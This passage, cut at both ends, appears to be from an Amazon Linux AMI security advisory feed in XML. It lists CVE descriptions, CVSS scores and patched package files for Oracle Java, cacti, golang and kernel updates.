Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21282:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JAXP). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).
CVE-2022-21248:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Serialization). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21248" title="" id="CVE-2022-21248" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21282" title="" id="CVE-2022-21282" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21283" title="" id="CVE-2022-21283" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21293" title="" id="CVE-2022-21293" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21294" title="" id="CVE-2022-21294" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21296" title="" id="CVE-2022-21296" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21299" title="" id="CVE-2022-21299" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21305" title="" id="CVE-2022-21305" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21340" title="" id="CVE-2022-21340" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21341" title="" id="CVE-2022-21341" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21349" title="" id="CVE-2022-21349" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21360" title="" id="CVE-2022-21360" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21365" title="" id="CVE-2022-21365" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21426" title="" id="CVE-2022-21426" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21434" title="" id="CVE-2022-21434" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21443" title="" id="CVE-2022-21443" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21476" title="" id="CVE-2022-21476" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21496" title="" id="CVE-2022-21496" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21540" title="" id="CVE-2022-21540" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21541" title="" id="CVE-2022-21541" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34169" title="" id="CVE-2022-34169" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-demo" version="1.7.0.321" release="2.6.28.1.86.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.321-2.6.28.1.86.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.321" release="2.6.28.1.86.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.321-2.6.28.1.86.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.321" release="2.6.28.1.86.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.321-2.6.28.1.86.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.321" release="2.6.28.1.86.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.321-2.6.28.1.86.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.321" release="2.6.28.1.86.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.321-2.6.28.1.86.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.321" release="2.6.28.1.86.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.321-2.6.28.1.86.amzn1.noarch.rpm</filename></package><package 
name="java-1.7.0-openjdk-src" version="1.7.0.321" release="2.6.28.1.86.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.321-2.6.28.1.86.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.321" release="2.6.28.1.86.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.321-2.6.28.1.86.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.321" release="2.6.28.1.86.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.321-2.6.28.1.86.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.321" release="2.6.28.1.86.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.321-2.6.28.1.86.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.321" release="2.6.28.1.86.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.321-2.6.28.1.86.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1634</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1634: critical priority package update for cacti</title><issued date="2022-09-15 03:57:00" /><updated date="2022-09-20 23:20:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-0730:
Under certain ldap conditions, Cacti authentication can be bypassed with certain credential types.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0730" title="" id="CVE-2022-0730" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cacti" version="1.1.19" release="2.19.amzn1" epoch="0" arch="noarch"><filename>Packages/cacti-1.1.19-2.19.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1635</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1635: important priority package update for golang</title><issued date="2022-09-15 03:57:00" /><updated date="2023-11-29 23:18:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-32148:
Improper exposure of client IP addresses in net/http before Go 1.17.12 and Go 1.18.4 can be triggered by calling httputil.ReverseProxy.ServeHTTP with a Request.Header map containing a nil value for the X-Forwarded-For header, which causes ReverseProxy to set the client IP as the value of the X-Forwarded-For header.
CVE-2022-30635:
A flaw was found in golang. When calling Decoder.Decode on a message that contains deeply nested structures, a panic can occur due to stack exhaustion and allows an attacker to impact system availability.
CVE-2022-30633:
Uncontrolled recursion in Unmarshal in encoding/xml before Go 1.17.12 and Go 1.18.4 allows an attacker to cause a panic due to stack exhaustion via unmarshalling an XML document into a Go struct which has a nested field that uses the any field tag.
CVE-2022-30632:
A flaw was found in golang. Calling Glob on a path that contains a large number of path separators can cause a panic issue due to stack exhaustion. This can cause an attacker to impact availability.
CVE-2022-30631:
A flaw was found in golang. Calling the Reader.Read method on an archive that contains a large number of concatenated 0-length compressed files can cause a panic issue due to stack exhaustion.
CVE-2022-30630:
A flaw was found in the golang standard library, io/fs. Calling Glob on a path that contains a large number of path separators can cause a panic issue due to stack exhaustion. This could allow an attacker to impact availability.
CVE-2022-30629:
Non-random values for ticket_age_add in session tickets in crypto/tls before Go 1.17.11 and Go 1.18.3 allow an attacker that can observe TLS handshakes to correlate successive connections by comparing ticket ages during session resumption.
CVE-2022-29526:
A flaw was found in the syscall.Faccessat function when calling a process by checking the group. This flaw allows an attacker to check the process group permissions rather than a member of the file's group, affecting system availability.
CVE-2022-28327:
An integer overflow flaw was found in Golang's crypto/elliptic library. This flaw allows an attacker to use a crafted scalar input longer than 32 bytes, causing P256().ScalarMult or P256().ScalarBaseMult to panic, leading to a loss of availability.
CVE-2022-28131:
A flaw was found in golang encoding/xml. When calling Decoder.Skip while parsing a deeply nested XML document, a panic can occur due to stack exhaustion and allows an attacker to impact system availability.
CVE-2022-27664:
In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.
CVE-2022-27191:
A broken cryptographic algorithm flaw was found in golang.org/x/crypto/ssh. This issue causes a client to fail authentication with RSA keys to servers that reject signature algorithms based on SHA-2, enabling an attacker to crash the server, resulting in a loss of availability.
CVE-2022-24921:
A stack overflow flaw was found in Golang's regexp module, which can crash the runtime if the application using regexp accepts very long or arbitrarily long regexps from untrusted sources that have sufficient nesting depths. To exploit this vulnerability, an attacker would need to send large regexps with deep nesting to the application. Triggering this flaw leads to a crash of the runtime, which causes a denial of service.
CVE-2022-24675:
A buffer overflow flaw was found in Golang's library encoding/pem. This flaw allows an attacker to use a large PEM input (more than 5 MB), causing a stack overflow in Decode, which leads to a loss of availability.
CVE-2022-23806:
A flaw was found in the elliptic package of the crypto library in golang when the IsOnCurve function could return true for invalid field elements. This flaw allows an attacker to take advantage of this undefined behavior, affecting the availability and integrity of the resource.
CVE-2022-23773:
cmd/go in Go before 1.16.14 and 1.17.x before 1.17.7 can misinterpret branch names that falsely appear to be version tags. This can lead to incorrect access control if an actor is supposed to be able to create branches but not tags.
CVE-2022-23772:
Rat.SetString in math/big in Go before 1.16.14 and 1.17.x before 1.17.7 has an overflow that can lead to Uncontrolled Memory Consumption.
CVE-2022-1962:
A flaw was found in the golang standard library, go/parser. When calling any Parse functions on the Go source code, which contains deeply nested types or declarations, a panic can occur due to stack exhaustion. This issue allows an attacker to impact system availability.
CVE-2022-1705:
A flaw was found in golang. The HTTP/1 client accepted invalid Transfer-Encoding headers indicating "chunked" encoding. This issue could allow request smuggling, but only if combined with an intermediate server that also improperly accepts the header as invalid.
CVE-2021-39293:
A vulnerability was found in archive/zip of the Go standard library. Applications written in Go can panic or potentially exhaust system memory when parsing malformed ZIP files. An attacker capable of submitting a crafted ZIP file to a Go application using archive/zip to process that file could cause a denial of service via memory exhaustion or panic. This particular flaw is an incomplete fix for a previous flaw.
CVE-2021-33196:
A vulnerability was found in archive/zip of the Go standard library. Applications written in Go can panic or potentially exhaust system memory when parsing malformed ZIP files.
CVE-2021-33195:
A flaw was found in Go. The LookupCNAME, LookupSRV, LookupMX, LookupNS, and LookupAddr functions in the net package and methods on the Resolver type, may return arbitrary values retrieved from DNS, allowing injection of unexpected contents. The highest threat from this vulnerability is to integrity.
CVE-2021-27919:
An out of bounds read vulnerability was found in golang. When using the archive/zip standard library (stdlib) and an unexpected file is parsed, it can cause golang to attempt to read outside of a slice (array) causing a panic in the runtime. A potential attacker can use this vulnerability to craft an archive which causes an application using this library to crash resulting in a Denial of Service (DoS).
CVE-2021-27918:
An infinite loop vulnerability was found in golang. If an application defines a custom token parser initializing with `xml.NewTokenDecoder` it is possible for the parsing loop to never return. An attacker could potentially craft a malicious XML document which has an XML element with `EOF` within it, causing the parsing application to endlessly loop, resulting in a Denial of Service (DoS).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27918" title="" id="CVE-2021-27918" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27919" title="" id="CVE-2021-27919" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33195" title="" id="CVE-2021-33195" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33196" title="" id="CVE-2021-33196" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39293" title="" id="CVE-2021-39293" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705" title="" id="CVE-2022-1705" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1962" title="" id="CVE-2022-1962" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23772" title="" id="CVE-2022-23772" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23773" title="" id="CVE-2022-23773" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23806" title="" id="CVE-2022-23806" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24675" title="" id="CVE-2022-24675" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24921" title="" id="CVE-2022-24921" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27191" title="" id="CVE-2022-27191" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664" title="" id="CVE-2022-27664" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28131" title="" id="CVE-2022-28131" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28327" title="" id="CVE-2022-28327" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526" title="" id="CVE-2022-29526" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30629" title="" id="CVE-2022-30629" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630" title="" id="CVE-2022-30630" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30631" title="" id="CVE-2022-30631" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632" title="" id="CVE-2022-30632" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30633" title="" id="CVE-2022-30633" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635" title="" id="CVE-2022-30635" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148" title="" id="CVE-2022-32148" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-bin" version="1.18.6" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.18.6-1.42.amzn1.x86_64.rpm</filename></package><package name="golang-shared" version="1.18.6" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-shared-1.18.6-1.42.amzn1.x86_64.rpm</filename></package><package name="golang-tests" version="1.18.6" release="1.42.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.18.6-1.42.amzn1.noarch.rpm</filename></package><package name="golang-src" version="1.18.6" release="1.42.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.18.6-1.42.amzn1.noarch.rpm</filename></package><package name="golang-docs" version="1.18.6" release="1.42.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.18.6-1.42.amzn1.noarch.rpm</filename></package><package name="golang-misc" version="1.18.6" release="1.42.amzn1" epoch="0" 
arch="noarch"><filename>Packages/golang-misc-1.18.6-1.42.amzn1.noarch.rpm</filename></package><package name="golang-race" version="1.18.6" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-race-1.18.6-1.42.amzn1.x86_64.rpm</filename></package><package name="golang" version="1.18.6" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.18.6-1.42.amzn1.x86_64.rpm</filename></package><package name="golang" version="1.18.6" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.18.6-1.42.amzn1.i686.rpm</filename></package><package name="golang-shared" version="1.18.6" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/golang-shared-1.18.6-1.42.amzn1.i686.rpm</filename></package><package name="golang-bin" version="1.18.6" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.18.6-1.42.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1636</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1636: important priority package update for kernel</title><issued date="2022-09-30 02:41:00" /><updated date="2025-03-13 20:58:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-2860:
The upstream advisory describes this issue as follows:
"This vulnerability allows local attackers to disclose sensitive information on affected installations of the Linux Kernel. An attacker must first obtain the ability to execute high-privileged code on the target system in order to exploit this vulnerability.
The specific flaw exists within the processing of seg6 attributes. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to escalate privileges and execute arbitrary code in the context of the kernel."
CVE-2022-49700:
In the Linux kernel, the following vulnerability has been resolved:
mm/slub: add missing TID updates on slab deactivation
CVE-2022-49647:
In the Linux kernel, the following vulnerability has been resolved:
cgroup: Use separate src/dst nodes when preloading css_sets for migration
CVE-2022-48687:
In the Linux kernel, the following vulnerability has been resolved: ipv6: sr: fix out-of-bounds read when setting HMAC data. The SRv6 layer allows defining HMAC data that can later be used to sign IPv6 Segment Routing Headers. This configuration is realised via netlink through four attributes: SEG6_ATTR_HMACKEYID, SEG6_ATTR_SECRET, SEG6_ATTR_SECRETLEN and SEG6_ATTR_ALGID.
CVE-2022-40307:
A race condition in the Linux kernel's EFI capsule loader driver was found in the way it handled write and flush operations on the device node of the EFI capsule. A local user could potentially use this flaw to crash the system.
CVE-2022-39188:
An issue was discovered in include/asm-generic/tlb.h in the Linux kernel before 5.19. Because of a race condition (unmap_mapping_range versus munmap), a device driver can free a page while it still has stale TLB entries. This only occurs in situations with VM_PFNMAP VMAs.
CVE-2022-36946:
A memory corruption flaw was found in the Linux kernel's Netfilter subsystem in the way a local user uses the libnetfilter_queue when analyzing a corrupted network packet. This flaw allows a local user to crash the system or a remote user to crash the system when the libnetfilter_queue is used by a local user.
CVE-2022-36879:
An issue was discovered in the Linux kernel through 5.18.14. xfrm_expand_policies in net/xfrm/xfrm_policy.c can cause a refcount to be dropped twice.
CVE-2022-36123:
A memory access flaw was found in the Linux kernel's XEN hypervisor for the virtual machine. This flaw allows a local user to crash the system or potentially escalate their privileges on the system.
CVE-2022-3028:
A race condition was found in the Linux kernel's IP framework for transforming packets (XFRM subsystem) when multiple calls to xfrm_probe_algs occurred simultaneously. This flaw could allow a local attacker to potentially trigger an out-of-bounds write or leak kernel heap memory by performing an out-of-bounds read and copying it into a socket.
CVE-2022-29901:
Intel microprocessor generations 6 to 8 are affected by a new Spectre variant that is able to bypass their retpoline mitigation in the kernel to leak arbitrary data. An attacker with unprivileged user access can hijack return instructions to achieve arbitrary speculative code execution under certain microarchitecture-dependent conditions.
CVE-2022-28693:
A flaw was found in hw. The unprotected alternative channel of return branch target prediction in some Intel(R) Processors may allow an authorized user to enable information disclosure via local access.
CVE-2022-2663:
An issue was found in the Linux kernel in nf_conntrack_irc where the message handling can be confused and incorrectly matches the message. A firewall may be able to be bypassed when users are using unencrypted IRC with nf_conntrack_irc configured.
CVE-2022-2588:
A use-after-free flaw was found in route4_change in the net/sched/cls_route.c filter implementation in the Linux kernel. This flaw allows a local user to crash the system and possibly lead to a local privilege escalation problem.
CVE-2022-2153:
A flaw was found in the Linux kernel's KVM when attempting to set a SynIC IRQ. This issue makes it possible for a misbehaving VMM to write to SYNIC/STIMER MSRs, causing a NULL pointer dereference. This flaw allows an unprivileged local attacker on the host to issue specific ioctl calls, causing a kernel oops condition that results in a denial of service.
CVE-2022-1679:
A use-after-free flaw was found in the Linux kernel's Atheros wireless adapter driver in the way a user forces the ath9k_htc_wait_for_target function to fail with some input messages. This flaw allows a local user to crash or potentially escalate their privileges on the system.
CVE-2022-1462:
An out-of-bounds read flaw was found in the Linux kernel's TeleTYpe subsystem. The issue occurs in how a user triggers a race condition using ioctls TIOCSPTLCK and TIOCGPTPEER and TIOCSTI and TCXONC with leakage of memory in the flush_to_ldisc function. This flaw allows a local user to crash the system or read unauthorized random data from memory.
CVE-2021-4159:
A vulnerability was found in the Linux kernel's EBPF verifier when handling internal data structures. Internal memory locations could be returned to userspace. A local attacker with the permissions to insert eBPF code to the kernel can use this to leak internal kernel memory details defeating some of the exploit mitigations in place for the kernel.
CVE-2021-33655:
An out-of-bounds write flaw was found in the Linux kernel's framebuffer-based console driver functionality in the way a user triggers ioctl FBIOPUT_VSCREENINFO with malicious data. This flaw allows a local user to crash or potentially escalate their privileges on the system.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33655" title="" id="CVE-2021-33655" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4159" title="" id="CVE-2021-4159" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1462" title="" id="CVE-2022-1462" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1679" title="" id="CVE-2022-1679" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2153" title="" id="CVE-2022-2153" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2588" title="" id="CVE-2022-2588" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2663" title="" id="CVE-2022-2663" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28693" title="" id="CVE-2022-28693" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29901" title="" id="CVE-2022-29901" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3028" title="" id="CVE-2022-3028" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36123" title="" id="CVE-2022-36123" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36879" title="" id="CVE-2022-36879" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36946" title="" id="CVE-2022-36946" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-39188" title="" id="CVE-2022-39188" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40307" title="" id="CVE-2022-40307" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48687" title="" id="CVE-2022-48687" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-49647" title="" id="CVE-2022-49647" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-49700" title="" id="CVE-2022-49700" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2860" title="" id="CVE-2023-2860" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf" version="4.14.294" release="150.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.294-150.533.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.294" release="150.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.294-150.533.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.294" release="150.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.294-150.533.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.294" release="150.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.294-150.533.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.294" release="150.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.294-150.533.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.294" release="150.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.294-150.533.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.294" release="150.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.294-150.533.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.294" release="150.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.294-150.533.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.294" 
release="150.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.294-150.533.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.294" release="150.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.294-150.533.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.294" release="150.533.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.294-150.533.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.294" release="150.533.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.294-150.533.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.294" release="150.533.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.294-150.533.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.294" release="150.533.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.294-150.533.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.294" release="150.533.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.294-150.533.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.294" release="150.533.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.294-150.533.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.294" release="150.533.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.294-150.533.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.294" release="150.533.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.294-150.533.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.294" release="150.533.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.294-150.533.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" 
